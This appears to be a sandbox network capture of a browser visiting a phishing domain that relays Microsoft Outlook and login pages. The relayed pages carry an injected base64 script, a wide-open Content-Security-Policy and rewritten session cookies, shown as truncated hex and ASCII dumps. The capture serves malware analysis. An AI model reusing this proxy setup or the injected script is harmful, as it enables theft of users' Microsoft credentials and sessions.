2024-04-26 11:21:06 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:06 UTC	769	OUT	GET / HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://wordpressprofissional.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s
2024-04-26 11:21:07 UTC	1171	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://r6duftx9uh6.scrdata-doc.cfd/owa/ Server: Microsoft-IIS/10.0 request-id: 4acb8946-dcfb-d229-d2d5-3ffadc787947 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-FEServer: AM0PR02CA0149, AM0PR02CA0149 X-RequestId: ac5312bb-b63c-44a9-b2f8-5bf505cf14a6 X-FEProxyInfo: AM0PR02CA0149.EURPRD02.PROD.OUTLOOK.COM X-FEEFZInfo: AMS MS-CV: RonLSvvcKdLS1T/63Hh5Rw.0 X-Powered-By: ASP.NET Date: Fri, 26 Apr 2024 11:21:06 GMT Connection: close Content-Length: 0 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:07 UTC	773	OUT	GET /owa/ HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://wordpressprofissional.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s
2024-04-26 11:21:08 UTC	7265	IN	HTTP/1.1 302 Found content-length: 1304 Content-Type: text/html; charset=utf-8 Location: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ Server: Microsoft-IIS/10.0 request-id: 47f98de9-a421-689a-73f0-dd24eb151341 Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-CalculatedFETarget: AM6P193CU002.internal.outlook.com X-BackEndHttpStatus: 302, 302 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; expires=Sat, 26-Apr-2025 11:21:08 GMT; path=/;SameSite=None; secure Set-Cookie: ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; expires=Sat, 26-Apr-2025 11:21:08 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Sat, 26-Oct-2024 11:21:08 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; expires=Fri, 26-Apr-2024 12:21:08 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OptInPrg=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: SuiteServiceProxyKey=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; expires=Sat, 26-Apr-2025 11:21:08 GMT; path=/;SameSite=None; secure Set-Cookie: OIDC=1; expires=Sat, 26-Oct-2024 11:21:08 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: RoutingKeyCookie=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.token.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.id_token.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.code.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_nonce.v1=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.idp_correlation_id=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.tokenPostPath=; domain=r6duftx9uh6.scrdata-doc.cfd; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; expires=Fri, 26-Apr-2024 12:21:08 GMT; path=/;SameSite=None; secure; HttpOnly Set-Cookie: HostSwitchPrg=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: OptInPrg=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: SuiteServiceProxyKey=; expires=Tue, 26-Apr-1994 11:21:08 GMT; path=/; secure Set-Cookie: X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; expires=Fri, 26-Apr-2024 17:23:08 GMT; path=/;SameSite=None; secure; HttpOnly X-CalculatedBETarget: AS2PR02MB10385.eurprd02.PROD.OUTLOOK.COM X-RUM-Validated: 1 X-RUM-NotUpdateQueriedPath: 1 X-RUM-NotUpdateQueriedDbCopy: 1 X-BeSku: WCS7 X-OWA-DiagnosticsInfo: 1;0;0 X-IIDs: 0 X-BackEnd-Begin: 2024-04-26T11:21:08.225 X-BackEnd-End: 2024-04-26T11:21:08.225 X-DiagInfo: AS2PR02MB10385 X-BEServer: AS2PR02MB10385 X-UA-Compatible: IE=EmulateIE7 X-Proxy-RoutingCorrectness: 1 X-Proxy-BackendServerStatus: 302 X-FEProxyInfo: AM0PR02CA0167.EURPRD02.PROD.OUTLOOK.COM X-FEEFZInfo: AMS X-FEServer: AM6P193CA0050, AM0PR02CA0167 NEL: {"report_to":"NelOfficeUpload1","max_age":7200,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01} X-FirstHopCafeEFZ: AMS Date: Fri, 26 Apr 2024 11:21:08 GMT Connection: close Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-26 11:21:08 UTC	1304	IN	Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 4e 31 62 57 56 75 64 43 35 6f 5a 57 46 6b 4c 6d 46 77 63 47 56 75 5a 45 4e 6f 61 57 78 6b 4b 45 39 69 61 6d 56 6a 64 43 35 68 63 33 4e 70 5a 32 34 6f 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 33 4a 6c 59 58 52 6c 52 57 78 6c 62 57 56 75 64 43 67 69 5a 47 6c 32 49 69 6b 73 65 Data Ascii: <html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKE9iamVjdC5hc3NpZ24oZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgiZGl2Iikse

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:08 UTC	1822	OUT	GET /?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://wordpressprofissional.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag
2024-04-26 11:21:09 UTC	2051	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Strict-Transport-Security: max-age=31536000; includeSubDomains P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" x-ms-request-id: 95ae6892-499e-4169-a024-ebaf52775c00 x-ms-ests-server: 2.1.17910.10 - WEULR1 ProdSlices nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0} x-ms-srs: 1.P Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; domain=r6duftx9uh6.scrdata-doc.cfd; path=/; secure; HttpOnly; SameSite=None Set-Cookie: fpc=Ag3Kly0IoDdBkfMWaLarS2Y; expires=Sun, 26-May-2024 11:21:09 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8Xa7tZ0SebpglM2T8wNj5qUiHXjDE8kzM4NSdE_IayLKIOQysDS2PA0gFadcG7C3F1Qb3Eis8Pzxbib5e2WtQ3OZsx1z-KmUvU6tXhDK42bF_XJGHSCB1p5OkGE6LzNjDbDp2uPiv6jJklS2Sjw6D_XWGoS0Wt5YsbwzflEZRlQkgAA; domain=r6duftx9uh6.scrdata-doc.cfd; path=/; secure; HttpOnly; SameSite=None Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly Date: Fri, 26 Apr 2024 11:21:08 GMT Connection: close content-length: 21184 Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
2024-04-26 11:21:09 UTC	14333	IN	Data Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32 Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
2024-04-26 11:21:09 UTC	6851	IN	Data Raw: 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 69 66 28 75 28 65 29 29 7b 72 65 74 75 72 6e 20 63 2e 4f 6e 45 72 72 6f 72 28 65 2c 74 29 7d 76 61 72 20 6e 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 2c 6f 3d 69 28 29 2c 73 3d 61 28 29 3b 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 4c 6f 61 64 65 64 22 2c 65 29 3b 76 61 72 20 64 3d 6e 65 77 20 63 0a 3b 64 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 46 61 69 6c 65 64 22 2c 64 2e 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 53 75 63 63 65 73 73 22 2c 64 2e 4c 6f 61 64 28 6e 75 6c 6c 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6f 29 7b 74 68 72 6f 77 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 2e 20 52 65 73 6f 75 72 63 65 4c 6f 61 64 65 72 2e 4c 6f 61 64 Data Ascii: not be null."}if(u(e)){return c.OnError(e,t)}var n=e.src\|\|e.href\|\|"",o=i(),s=a();r("[$Loader]: Loaded",e);var d=new c;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.Load(null,function(){if(o){throw"Unexpected state. ResourceLoader.Load

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:10 UTC	2246	OUT	GET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_Ggyc2EJnCaHFrI6xkBPLcg2.js HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; fpc=Ag3Kly0IoDdBkfMWaLarS2Y; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8Xa7tZ0SebpglM2T8wNj5qUiHXjDE8kzM4NSdE_IayLKIOQysDS2PA0gFadcG7C3F1Qb3Eis8Pzxbib5e2WtQ3OZsx1z-KmUvU6tXhDK42bF_XJGHSCB1p5OkGE6LzNjDbDp2uPiv6jJklS2Sjw6D_XWGoS0Wt5YsbwzflEZRlQkgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
2024-04-26 11:21:11 UTC	1343	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 2011706 Cache-Control: public, max-age=31536000 Content-MD5: OdlDOzXlgXZa124Z7O0jlA== Content-Type: application/x-javascript Date: Fri, 26 Apr 2024 11:21:10 GMT Etag: 0x8DC52767B578035 Last-Modified: Mon, 01 Apr 2024 18:06:40 GMT Server: ECAcc (ama/48D2) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 3dd41352-f01e-00c8-447f-858673000000 x-ms-version: 2009-09-19 content-length: 141321 Connection: close Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
